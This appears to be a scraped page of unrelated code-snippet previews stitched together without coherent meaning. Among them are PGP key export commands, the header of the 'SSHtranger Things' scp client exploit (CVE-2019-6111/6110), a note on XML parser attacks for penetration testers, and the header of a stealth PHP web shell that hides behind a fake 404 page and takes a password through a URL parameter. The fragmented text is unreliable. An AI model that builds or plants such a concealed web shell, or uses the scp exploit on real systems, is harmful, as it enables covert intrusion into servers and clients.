Export your public key:
keybase pgp export > keybase-public.key
Export your private key:
keybase pgp export --secret > keybase-private.key
''' | |
Title: SSHtranger Things | |
Author: Mark E. Haase <mhaase@hyperiongray.com> | |
Homepage: https://www.hyperiongray.com | |
Date: 2019-01-17 | |
CVE: CVE-2019-6111, CVE-2019-6110 | |
Advisory: https://sintonen.fi/advisories/scp-client-multiple-vulnerabilities.txt | |
Tested on: Ubuntu 18.04.1 LTS, OpenSSH client 7.6p1 | |
We have nicknamed this "SSHtranger Things" because the bug is so old it could be |
def inet_ntoa(n): | |
import socket, struct | |
if n: | |
try: | |
packed_value = struct.pack('!I', int(n)) | |
ip = socket.inet_ntoa(packed_value) | |
return ip | |
except: | |
return None | |
return None |
Export your public key:
keybase pgp export > keybase-public.key
Export your private key:
keybase pgp export --secret > keybase-private.key
#!/bin/sh | |
# | |
# INFO | |
# | |
# This works if sonarr and radarr are set up to have a Category of sonarr and radarr respectively | |
# If you are using other Categories to save your automated downloads, update the script where you see: | |
# "radarr"|"sonarr") | |
# This script will not touch anything outside those Categories |
What would you need:
Hardware requirements
_ | |
StatsGen 0.0.3 | | | |
_ __ __ _ ___| | _ | |
| '_ \ / _` |/ __| |/ / | |
| |_) | (_| | (__| < | |
| .__/ \__,_|\___|_|\_\ | |
| | | |
|_| iphelix@thesprawl.org | |
XML processing modules may be not secure against maliciously constructed data. An attacker could abuse XML features to carry out denial of service attacks, access logical files, generate network connections to other machines, or circumvent firewalls.
The penetration tester running XML tests against application will have to determine which XML parser is in use, and then to what kinds of below listed attacks that parser will be vulnerable.
<?php | |
/* | |
* # IndoXploit v3 Web Shell (Stealth Version) | |
* # What was involved? | |
* - Uses dynamic 404 page from the server to make the web shell looks like it was deleted | |
* - Login method is by using GET parameters, (example: 'http://example.com/idx_s.php?passwd=password_saia_kaka') | |
* # Important Bookmark | |
* - Password configuration at line 27 | |
* - login_shell() function at line 40-52 | |
* - Login validation at line 57-64 |
/* | |
Navicat Premium Data Transfer | |
Source Server : localhost | |
Source Server Type : MySQL | |
Source Server Version : 50542 | |
Source Host : localhost | |
Source Database : rule | |
Target Server Type : MySQL |